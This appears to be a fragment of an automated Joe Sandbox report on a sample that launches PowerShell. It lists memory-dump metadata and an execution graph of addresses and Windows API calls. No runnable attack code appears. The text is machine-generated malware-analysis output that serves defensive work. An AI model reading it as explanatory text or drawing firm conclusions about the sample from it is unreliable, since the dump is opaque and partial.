                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                              • String ID: :
                                                              • API String ID: 2595371189-336475711
                                                              • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                              • Instruction ID: 5efa9ca9b9e8c2a2314436d27ea6877620663d8825c206dae8e1fdef55b359fa
                                                              • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                              • Instruction Fuzzy Hash: 93017822E1864786EB30EB60946127E63A0EF4C74CF841036D56DC26E1FEACE555CA14
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: !$..\s\crypto\ct\ct_policy.c
                                                              • API String ID: 3568877910-3401457818
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastioctlsocket
                                                              • String ID: ..\s\crypto\bio\b_sock.c
                                                              • API String ID: 1021210092-540685895
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1959111539.00007FFD9AEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AEE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9aee0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1956780631.00007FFD9ACFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ACFD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9acfd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1958210433.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1958210433.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1958210433.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1959111539.00007FFD9AEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AEE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9aee0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1959111539.00007FFD9AEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AEE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9aee0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1958210433.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1958210433.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                              • API String ID: 0-1500707516
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1958210433.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                              • API String ID: 0-679677686
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1958210433.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^$M_^$M_^$M_^
                                                              • API String ID: 0-1397233021
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.1873454211.00007FFD9AEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AEE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd9aee0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.1872809225.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.1872809225.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:

                                                              Execution Graph

                                                              Execution Coverage: 7.7%
                                                              Dynamic/Decrypted Code Coverage: 0%
                                                              Signature Coverage: 0.5%
                                                              Total number of Nodes: 1209
                                                              Total number of Limit Nodes: 40
38490->38502 38503 7ff629b3729c 38490->38503 38525 7ff629b14554 38490->38525 38491 7ff629b37453 38494 7ff629b37476 38491->38494 38495 7ff629b37464 38491->38495 38493 7ff629b376ef 38493->38502 38542 7ff629b18558 10 API calls 2 library calls 38493->38542 38496 7ff629b37496 38494->38496 38522 7ff629b14538 38494->38522 38539 7ff629b37c38 55 API calls 3 library calls 38495->38539 38496->38502 38508 7ff629b14554 16 API calls 38496->38508 38498 7ff629b37471 38498->38494 38501 7ff629b37342 38501->38493 38501->38502 38514 7ff629b37656 38501->38514 38540 7ff629b04380 14 API calls 38501->38540 38543 7ff629b4a610 38502->38543 38505 7ff629b373bb 38503->38505 38507 7ff629b3732e 38503->38507 38533 7ff629b4a444 38505->38533 38507->38501 38510 7ff629b3734a 38507->38510 38508->38502 38509 7ff629b3737e 38509->38502 38532 7ff629b0cbd0 75 API calls 38509->38532 38510->38502 38510->38509 38531 7ff629b04380 14 API calls 38510->38531 38513 7ff629b37723 38541 7ff629afc214 8 API calls 2 library calls 38513->38541 38514->38493 38514->38502 38514->38513 38517->38451 38520 7ff629b145ed 38518->38520 38519 7ff629b146ec 15 API calls 38519->38520 38520->38519 38521 7ff629b146b2 38520->38521 38521->38491 38521->38501 38523 7ff629b14549 FindClose 38522->38523 38524 7ff629b1454f 38522->38524 38523->38524 38524->38496 38526 7ff629b14570 38525->38526 38530 7ff629b14574 38526->38530 38552 7ff629b146ec 38526->38552 38529 7ff629b1458d FindClose 38529->38530 38530->38503 38531->38509 38532->38502 38535 7ff629b4a44f 38533->38535 38534 7ff629b4a47a 38534->38485 38535->38534 38580 7ff629b536c0 38535->38580 38583 7ff629b4b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38535->38583 38584 7ff629b4b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38535->38584 38539->38498 38540->38514 38541->38502 38542->38502 38544 7ff629b4a61a 38543->38544 38545 7ff629b3776f 38544->38545 38546 7ff629b4a6a0 IsProcessorFeaturePresent 38544->38546 38545->38451 
38547 7ff629b4a6b7 38546->38547 38591 7ff629b4a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38547->38591 38549 7ff629b4a6ca 38592 7ff629b4a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38549->38592 38553 7ff629b14705 setbuf 38552->38553 38554 7ff629b14733 FindFirstFileW 38553->38554 38555 7ff629b147a4 FindNextFileW 38553->38555 38557 7ff629b14749 38554->38557 38564 7ff629b1478b 38554->38564 38556 7ff629b147ae GetLastError 38555->38556 38555->38564 38556->38564 38565 7ff629b24534 38557->38565 38559 7ff629b4a610 _handle_error 8 API calls 38563 7ff629b14587 38559->38563 38561 7ff629b1477a GetLastError 38561->38564 38562 7ff629b1475f FindFirstFileW 38562->38561 38562->38564 38563->38529 38563->38530 38564->38559 38566 7ff629b24549 setbuf 38565->38566 38576 7ff629b245a2 38566->38576 38577 7ff629b2472c CharUpperW 38566->38577 38568 7ff629b4a610 _handle_error 8 API calls 38570 7ff629b1475b 38568->38570 38569 7ff629b24579 38578 7ff629b24760 CharUpperW 38569->38578 38570->38561 38570->38562 38572 7ff629b24592 38573 7ff629b24629 GetCurrentDirectoryW 38572->38573 38574 7ff629b2459a 38572->38574 38573->38576 38579 7ff629b2472c CharUpperW 38574->38579 38576->38568 38577->38569 38578->38572 38579->38576 38585 7ff629b53700 38580->38585 38590 7ff629b56938 EnterCriticalSection 38585->38590 38587 7ff629b5370d 38588 7ff629b56998 fflush LeaveCriticalSection 38587->38588 38589 7ff629b536d2 38588->38589 38589->38535 38591->38549 38593->38460 38594->38462 38597 7ff629b23626 setbuf wcschr 38595->38597 38596 7ff629b4a610 _handle_error 8 API calls 38598 7ff629af57e1 38596->38598 38597->38596 38598->38479 38600 7ff629b248bc 38598->38600 38599->38480 38601 7ff629b248cb setbuf 38600->38601 38602 7ff629b4a610 _handle_error 8 API calls 38601->38602 38603 7ff629b2493a 38602->38603 38603->38479 38605 7ff629b08919 38604->38605 38641 7ff629b34b14 38605->38641 38607 7ff629b08954 memcpy_s 38607->38407 38609 7ff629b29199 38608->38609 38646 
7ff629b4a480 38609->38646 38612 7ff629b4a444 new 4 API calls 38613 7ff629b291cf 38612->38613 38614 7ff629b088dc 8 API calls 38613->38614 38615 7ff629b291e1 38613->38615 38614->38615 38616 7ff629b4a444 new 4 API calls 38615->38616 38617 7ff629b291f7 38616->38617 38618 7ff629b29209 38617->38618 38619 7ff629b088dc 8 API calls 38617->38619 38618->38409 38619->38618 38621 7ff629b088dc 8 API calls 38620->38621 38622 7ff629b27063 38621->38622 38654 7ff629b272c0 38622->38654 38658 7ff629b0901c CryptAcquireContextW 38625->38658 38629 7ff629b09c2a 38668 7ff629b39ce4 38629->38668 38633 7ff629b09c5b memcpy_s 38634 7ff629b4a610 _handle_error 8 API calls 38633->38634 38635 7ff629af1a01 38634->38635 38635->38271 38685 7ff629b37d80 38636->38685 38642 7ff629b34b26 38641->38642 38643 7ff629b34b2b 38641->38643 38645 7ff629b34b38 8 API calls _handle_error 38642->38645 38643->38607 38645->38643 38651 7ff629b4a444 38646->38651 38647 7ff629b291be 38647->38612 38648 7ff629b536c0 new 2 API calls 38648->38651 38651->38647 38651->38648 38652 7ff629b4b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38651->38652 38653 7ff629b4b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38651->38653 38655 7ff629b272dd 38654->38655 38656 7ff629b4a480 4 API calls 38655->38656 38657 7ff629af7325 38655->38657 38656->38657 38657->38412 38657->38413 38659 7ff629b09057 CryptGenRandom CryptReleaseContext 38658->38659 38660 7ff629b0907e 38658->38660 38659->38660 38661 7ff629b09089 38659->38661 38662 7ff629b09c9c 11 API calls 38660->38662 38663 7ff629b09c9c 38661->38663 38662->38661 38664 7ff629b3c0a8 10 API calls 38663->38664 38665 7ff629b09cc5 38664->38665 38678 7ff629b52d74 38665->38678 38669 7ff629b09c49 38668->38669 38670 7ff629b39d15 memcpy_s 38668->38670 38672 7ff629b39b70 38669->38672 38670->38669 38681 7ff629b39d74 38670->38681 38673 7ff629b39bad memcpy_s 38672->38673 38674 7ff629b39bd9 memcpy_s 38672->38674 38673->38674 38677 7ff629b39d74 
8 API calls 38673->38677 38675 7ff629b39d74 8 API calls 38674->38675 38676 7ff629b39c07 38675->38676 38676->38633 38677->38674 38679 7ff629b52d8b QueryPerformanceCounter 38678->38679 38680 7ff629b09cd7 38678->38680 38679->38680 38680->38629 38682 7ff629b39dbc 38681->38682 38682->38682 38683 7ff629b4a610 _handle_error 8 API calls 38682->38683 38684 7ff629b39f40 38683->38684 38684->38670 38692 7ff629b38094 38685->38692 38688 7ff629b18a44 38689 7ff629b18a5a memcpy_s 38688->38689 38724 7ff629b3bac4 38689->38724 38693 7ff629b3809f 38692->38693 38696 7ff629b37ec8 38693->38696 38697 7ff629b37efa memcpy_s 38696->38697 38703 7ff629b37fb5 38697->38703 38710 7ff629b3b3f0 38697->38710 38699 7ff629b3805c GetCurrentProcessId 38701 7ff629b1896e 38699->38701 38701->38688 38702 7ff629b37f7e GetProcAddressForCaller GetProcAddress 38702->38703 38703->38699 38704 7ff629b37ff1 38703->38704 38704->38701 38719 7ff629b0ca6c 48 API calls 3 library calls 38704->38719 38706 7ff629b3801f 38720 7ff629b0cda4 10 API calls 2 library calls 38706->38720 38708 7ff629b38027 38721 7ff629b0ca40 61 API calls _CxxThrowException 38708->38721 38722 7ff629b4a5a0 38710->38722 38713 7ff629b3b428 38717 7ff629b4a610 _handle_error 8 API calls 38713->38717 38714 7ff629b3b42c 38715 7ff629b248bc 8 API calls 38714->38715 38716 7ff629b3b444 LoadLibraryW 38715->38716 38716->38713 38718 7ff629b37f72 38717->38718 38718->38702 38718->38703 38719->38706 38720->38708 38721->38701 38723 7ff629b3b3fc GetSystemDirectoryW 38722->38723 38723->38713 38723->38714 38727 7ff629b3ba70 GetCurrentProcess GetProcessAffinityMask 38724->38727 38728 7ff629b189c5 38727->38728 38728->38412 38732 7ff629b29245 38729->38732 38731 7ff629b292b1 38738 7ff629b16194 72 API calls 38731->38738 38737 7ff629b16194 72 API calls 38732->38737 38734 7ff629b292bd 38739 7ff629b16194 72 API calls 38734->38739 38736 7ff629b292c9 38737->38731 38738->38734 38739->38736 38740->38426 38741->38432 38742->38431 38743->38435 38744->38423 38745->38427 38746->38425 
38747->38440 38748 7ff629b4b0fc 38767 7ff629b4aa8c 38748->38767 38752 7ff629b4b148 38758 7ff629b4b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 38752->38758 38775 7ff629b5472c 38752->38775 38753 7ff629b4b123 __scrt_acquire_startup_lock 38753->38752 38823 7ff629b4b52c 7 API calls memcpy_s 38753->38823 38756 7ff629b4b16d 38757 7ff629b4b1f7 38779 7ff629b53fc4 38757->38779 38758->38756 38758->38757 38824 7ff629b52574 35 API calls IsInExceptionSpec 38758->38824 38766 7ff629b4b220 38825 7ff629b4ac64 8 API calls 2 library calls 38766->38825 38768 7ff629b4aaae __isa_available_init 38767->38768 38826 7ff629b4e2f8 38768->38826 38773 7ff629b4aab7 38773->38753 38822 7ff629b4b52c 7 API calls memcpy_s 38773->38822 38777 7ff629b54744 38775->38777 38776 7ff629b54766 38776->38758 38777->38776 38875 7ff629b4b010 38777->38875 38780 7ff629b53fd4 38779->38780 38781 7ff629b4b20c 38779->38781 38967 7ff629b53c84 38780->38967 38783 7ff629b27e20 38781->38783 39007 7ff629b3b470 GetModuleHandleW 38783->39007 38789 7ff629b27e58 SetErrorMode GetModuleHandleW 38790 7ff629b348cc 21 API calls 38789->38790 38791 7ff629b27e7d 38790->38791 38792 7ff629b33e48 137 API calls 38791->38792 38793 7ff629b27e90 38792->38793 38794 7ff629b03d3c 126 API calls 38793->38794 38795 7ff629b27e9c 38794->38795 38796 7ff629b4a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38795->38796 38797 7ff629b27ead 38796->38797 38798 7ff629b27ebf 38797->38798 38799 7ff629b03f18 70 API calls 38797->38799 38800 7ff629b04d1c 157 API calls 38798->38800 38799->38798 38801 7ff629b27ed6 38800->38801 38802 7ff629b27eef 38801->38802 38804 7ff629b06ad0 154 API calls 38801->38804 38803 7ff629b04d1c 157 API calls 38802->38803 38805 7ff629b27eff 38803->38805 38806 7ff629b27ee7 38804->38806 38808 7ff629b27f0d 38805->38808 38810 7ff629b27f14 38805->38810 38807 7ff629b04e48 160 API calls 38806->38807 38807->38802 38809 7ff629b3b650 CreateEventW CloseHandle CreateEventW GetLastError 
CloseHandle 38808->38809 38809->38810 38811 7ff629b04888 58 API calls 38810->38811 38812 7ff629b27f57 38811->38812 38813 7ff629b04fd0 268 API calls 38812->38813 38815 7ff629b27f5f 38813->38815 38814 7ff629b27f9e 38820 7ff629b4b684 GetModuleHandleW 38814->38820 38815->38814 38816 7ff629b27f8c 38815->38816 38817 7ff629b3b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38816->38817 38818 7ff629b27f93 38817->38818 38818->38814 38819 7ff629b3b57c 14 API calls 38818->38819 38819->38814 38821 7ff629b4b698 38820->38821 38821->38766 38822->38753 38823->38752 38824->38757 38825->38756 38827 7ff629b4e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 38826->38827 38839 7ff629b4eb08 38827->38839 38830 7ff629b4aab3 38830->38773 38834 7ff629b545e4 38830->38834 38832 7ff629b4e318 38832->38830 38846 7ff629b4eb50 DeleteCriticalSection 38832->38846 38835 7ff629b59d4c 38834->38835 38836 7ff629b4aac0 38835->38836 38863 7ff629b566c0 38835->38863 38836->38773 38838 7ff629b4e32c 8 API calls 3 library calls 38836->38838 38838->38773 38841 7ff629b4eb10 38839->38841 38842 7ff629b4eb41 38841->38842 38843 7ff629b4e30b 38841->38843 38847 7ff629b4e678 38841->38847 38852 7ff629b4eb50 DeleteCriticalSection 38842->38852 38843->38830 38845 7ff629b4e8a4 8 API calls 3 library calls 38843->38845 38845->38832 38846->38830 38853 7ff629b4e34c 38847->38853 38850 7ff629b4e6cf InitializeCriticalSectionAndSpinCount 38851 7ff629b4e6bb 38850->38851 38851->38841 38852->38843 38854 7ff629b4e3b2 38853->38854 38859 7ff629b4e3ad 38853->38859 38854->38850 38854->38851 38855 7ff629b4e47a 38855->38854 38857 7ff629b4e489 GetProcAddress 38855->38857 38856 7ff629b4e3e5 LoadLibraryExW 38858 7ff629b4e40b GetLastError 38856->38858 38856->38859 38857->38854 38860 7ff629b4e4a1 38857->38860 38858->38859 38861 7ff629b4e416 LoadLibraryExW 38858->38861 38859->38854 38859->38855 38859->38856 38862 7ff629b4e458 FreeLibrary 38859->38862 38860->38854 38861->38859 38862->38859 38874 
7ff629b56938 EnterCriticalSection 38863->38874 38865 7ff629b566d0 38866 7ff629b58050 32 API calls 38865->38866 38867 7ff629b566d9 38866->38867 38868 7ff629b566e7 38867->38868 38869 7ff629b564d0 34 API calls 38867->38869 38870 7ff629b56998 fflush LeaveCriticalSection 38868->38870 38871 7ff629b566e2 38869->38871 38872 7ff629b566f3 38870->38872 38873 7ff629b565bc GetStdHandle GetFileType 38871->38873 38872->38835 38873->38868 38876 7ff629b4b020 pre_c_initialization 38875->38876 38896 7ff629b52b00 38876->38896 38878 7ff629b4b02c pre_c_initialization 38902 7ff629b4aad8 38878->38902 38880 7ff629b4b045 38881 7ff629b4b049 _RTC_Initialize 38880->38881 38882 7ff629b4b0b5 38880->38882 38907 7ff629b4ace0 38881->38907 38939 7ff629b4b52c 7 API calls memcpy_s 38882->38939 38884 7ff629b4b0bf 38940 7ff629b4b52c 7 API calls memcpy_s 38884->38940 38886 7ff629b4b05a pre_c_initialization 38910 7ff629b53b0c 38886->38910 38888 7ff629b4b0ca __scrt_initialize_default_local_stdio_options 38888->38777 38891 7ff629b4b06a 38938 7ff629b4b7dc RtlInitializeSListHead 38891->38938 38893 7ff629b4b06f pre_c_initialization __InternalCxxFrameHandler 38894 7ff629b54818 pre_c_initialization 35 API calls 38893->38894 38895 7ff629b4b09a pre_c_initialization 38894->38895 38895->38777 38897 7ff629b52b11 38896->38897 38898 7ff629b52b19 38897->38898 38941 7ff629b54f3c 15 API calls memcpy_s 38897->38941 38898->38878 38900 7ff629b52b28 38942 7ff629b54e1c 31 API calls _invalid_parameter_noinfo 38900->38942 38903 7ff629b4ab96 38902->38903 38906 7ff629b4aaf0 __scrt_initialize_onexit_tables __scrt_release_startup_lock 38902->38906 38943 7ff629b4b52c 7 API calls memcpy_s 38903->38943 38905 7ff629b4aba0 38906->38880 38944 7ff629b4ac90 38907->38944 38909 7ff629b4ace9 38909->38886 38911 7ff629b53b2a 38910->38911 38912 7ff629b53b40 38910->38912 38949 7ff629b54f3c 15 API calls memcpy_s 38911->38949 38951 7ff629b59370 38912->38951 38915 7ff629b53b2f 38950 7ff629b54e1c 31 API calls _invalid_parameter_noinfo 38915->38950 
38918 7ff629b53b72 38955 7ff629b538ec 35 API calls pre_c_initialization 38918->38955 38919 7ff629b4b066 38919->38884 38919->38891 38921 7ff629b53b9c 38956 7ff629b53aa8 15 API calls __vcrt_getptd_noexit 38921->38956 38923 7ff629b53bb2 38924 7ff629b53bba 38923->38924 38925 7ff629b53bcb 38923->38925 38957 7ff629b54f3c 15 API calls memcpy_s 38924->38957 38958 7ff629b538ec 35 API calls pre_c_initialization 38925->38958 38928 7ff629b54a74 __vcrt_getptd_noexit 15 API calls 38928->38919 38929 7ff629b53be7 38930 7ff629b53c17 38929->38930 38931 7ff629b53c30 38929->38931 38935 7ff629b53bbf 38929->38935 38959 7ff629b54a74 38930->38959 38933 7ff629b54a74 __vcrt_getptd_noexit 15 API calls 38931->38933 38933->38935 38934 7ff629b53c20 38936 7ff629b54a74 __vcrt_getptd_noexit 15 API calls 38934->38936 38935->38928 38937 7ff629b53c2c 38936->38937 38937->38919 38939->38884 38940->38888 38941->38900 38942->38898 38943->38905 38945 7ff629b4acbf 38944->38945 38947 7ff629b4acb5 _onexit 38944->38947 38948 7ff629b54434 34 API calls _onexit 38945->38948 38947->38909 38948->38947 38949->38915 38950->38919 38952 7ff629b5937d 38951->38952 38953 7ff629b53b45 GetModuleFileNameA 38951->38953 38965 7ff629b591b0 48 API calls 5 library calls 38952->38965 38953->38918 38955->38921 38956->38923 38957->38935 38958->38929 38960 7ff629b54a79 RtlRestoreThreadPreferredUILanguages 38959->38960 38964 7ff629b54aa9 __vcrt_getptd_noexit 38959->38964 38961 7ff629b54a94 38960->38961 38960->38964 38966 7ff629b54f3c 15 API calls memcpy_s 38961->38966 38963 7ff629b54a99 GetLastError 38963->38964 38964->38934 38965->38953 38966->38963 38968 7ff629b53c98 38967->38968 38972 7ff629b53ca1 38967->38972 38968->38972 38973 7ff629b53ccc 38968->38973 38972->38781 38974 7ff629b53ce5 38973->38974 38983 7ff629b53caa 38973->38983 38975 7ff629b59370 pre_c_initialization 48 API calls 38974->38975 38976 7ff629b53cea 38975->38976 38986 7ff629b5978c GetEnvironmentStringsW 38976->38986 38979 7ff629b53cf7 38982 7ff629b54a74 
__vcrt_getptd_noexit 15 API calls 38979->38982 38981 7ff629b53d04 38984 7ff629b54a74 __vcrt_getptd_noexit 15 API calls 38981->38984 38982->38983 38983->38972 38985 7ff629b53e78 17 API calls __vcrt_getptd_noexit 38983->38985 38984->38979 38985->38972 38987 7ff629b597ba WideCharToMultiByte 38986->38987 38988 7ff629b5985e 38986->38988 38987->38988 38992 7ff629b59814 38987->38992 38990 7ff629b59868 FreeEnvironmentStringsW 38988->38990 38991 7ff629b53cef 38988->38991 38990->38991 38991->38979 38998 7ff629b53d38 31 API calls 3 library calls 38991->38998 38999 7ff629b54ab4 38992->38999 38995 7ff629b5984b 38997 7ff629b54a74 __vcrt_getptd_noexit 15 API calls 38995->38997 38996 7ff629b59824 WideCharToMultiByte 38996->38995 38997->38988 38998->38981 39000 7ff629b54aff 38999->39000 39005 7ff629b54ac3 __vcrt_getptd_noexit 38999->39005 39006 7ff629b54f3c 15 API calls memcpy_s 39000->39006 39002 7ff629b54ae6 RtlAllocateHeap 39003 7ff629b54afd 39002->39003 39002->39005 39003->38995 39003->38996 39004 7ff629b536c0 new 2 API calls 39004->39005 39005->39000 39005->39002 39005->39004 39006->39003 39008 7ff629b3b496 GetProcAddress 39007->39008 39009 7ff629b27e45 39007->39009 39010 7ff629b3b4cb GetProcAddress 39008->39010 39011 7ff629b3b4ae 39008->39011 39012 7ff629b07a68 39009->39012 39010->39009 39011->39010 39013 7ff629b07a76 39012->39013 39033 7ff629b52ae4 39013->39033 39015 7ff629b07a80 39016 7ff629b52ae4 setbuf 60 API calls 39015->39016 39017 7ff629b07a94 39016->39017 39042 7ff629b07b44 GetStdHandle GetFileType 39017->39042 39020 7ff629b07b44 3 API calls 39021 7ff629b07aae 39020->39021 39022 7ff629b07b44 3 API calls 39021->39022 39024 7ff629b07abe 39022->39024 39023 7ff629b07b12 39032 7ff629b0cd78 SetConsoleCtrlHandler 39023->39032 39026 7ff629b07aeb 39024->39026 39045 7ff629b52abc 31 API calls 2 library calls 39024->39045 39026->39023 39047 7ff629b52abc 31 API calls 2 library calls 39026->39047 39027 7ff629b07adf 39046 7ff629b52b40 33 API calls 3 library calls 39027->39046 39030 
7ff629b07b06 39048 7ff629b52b40 33 API calls 3 library calls 39030->39048 39034 7ff629b52ae9 39033->39034 39035 7ff629b57ee8 39034->39035 39038 7ff629b57f23 39034->39038 39049 7ff629b54f3c 15 API calls memcpy_s 39035->39049 39037 7ff629b57eed 39050 7ff629b54e1c 31 API calls _invalid_parameter_noinfo 39037->39050 39051 7ff629b57d98 60 API calls 2 library calls 39038->39051 39041 7ff629b57ef8 39041->39015 39043 7ff629b07b61 GetConsoleMode 39042->39043 39044 7ff629b07a9e 39042->39044 39043->39044 39044->39020 39045->39027 39046->39026 39047->39030 39048->39023 39049->39037 39050->39041 39051->39041 39052 7ff629b5231c 39053 7ff629b5238c 39052->39053 39054 7ff629b52342 GetModuleHandleW 39052->39054 39065 7ff629b56938 EnterCriticalSection 39053->39065 39054->39053 39058 7ff629b5234f 39054->39058 39056 7ff629b56998 fflush LeaveCriticalSection 39057 7ff629b52460 39056->39057 39060 7ff629b5246c 39057->39060 39064 7ff629b52488 11 API calls 39057->39064 39058->39053 39066 7ff629b524d4 GetModuleHandleExW 39058->39066 39059 7ff629b52410 39059->39056 39061 7ff629b52396 39061->39059 39062 7ff629b543b8 16 API calls 39061->39062 39062->39059 39064->39060 39067 7ff629b52525 39066->39067 39068 7ff629b524fe GetProcAddress 39066->39068 39070 7ff629b52535 39067->39070 39071 7ff629b5252f FreeLibrary 39067->39071 39068->39067 39069 7ff629b52518 39068->39069 39069->39067 39070->39053 39071->39070 39072 7ff629af3b53 39073 7ff629af3b64 39072->39073 39123 7ff629b11e80 39073->39123 39074 7ff629af3c09 39135 7ff629b123f0 39074->39135 39075 7ff629af3bb6 39075->39074 39077 7ff629af3c18 39075->39077 39078 7ff629af3c01 39075->39078 39145 7ff629af8050 157 API calls 39077->39145 39140 7ff629b11c24 39078->39140 39081 7ff629af3c3d 39146 7ff629af8010 13 API calls 39081->39146 39082 7ff629af3ccc 39104 7ff629af3c90 39082->39104 39153 7ff629b12414 61 API calls 39082->39153 39085 7ff629af3c45 39088 7ff629af3c54 39085->39088 39147 7ff629b0cba8 75 API calls 39085->39147 39087 7ff629af3cf9 39154 7ff629b11998 
